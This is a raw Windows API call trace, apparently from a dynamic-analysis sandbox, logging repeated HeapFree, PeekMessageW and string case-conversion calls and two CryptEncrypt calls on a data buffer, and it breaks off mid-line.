1 [0255.185] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.186] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.186] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.187] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.187] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.188] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.188] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.188] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.189] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.189] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.190] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0255.190] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0255.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.190] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0255.191] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.191] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.191] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.191] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.192] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0255.192] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0255.193] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ddfb0 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0255.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0255.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0255.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0255.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0255.197] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x7712, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x7718) returned 1 [0255.197] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.198] CharLowerBuffW (in: lpsz="byte[30488]", cchLength=0xb | out: lpsz="byte[30488]") returned 0xb [0255.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.199] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.200] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.201] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24ddfb0*, pdwDataLen=0x8bef68*=0x7712, dwBufLen=0x7718 | out: pbData=0x24ddfb0*, pdwDataLen=0x8bef68*=0x7718) returned 1 [0255.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.204] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.204] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.204] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.204] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0255.204] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.204] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0255.205] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.205] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.205] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0255.205] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.205] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0255.205] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.205] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.205] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.205] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.205] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.205] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.206] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.206] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.206] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.206] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.210] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.210] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.210] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 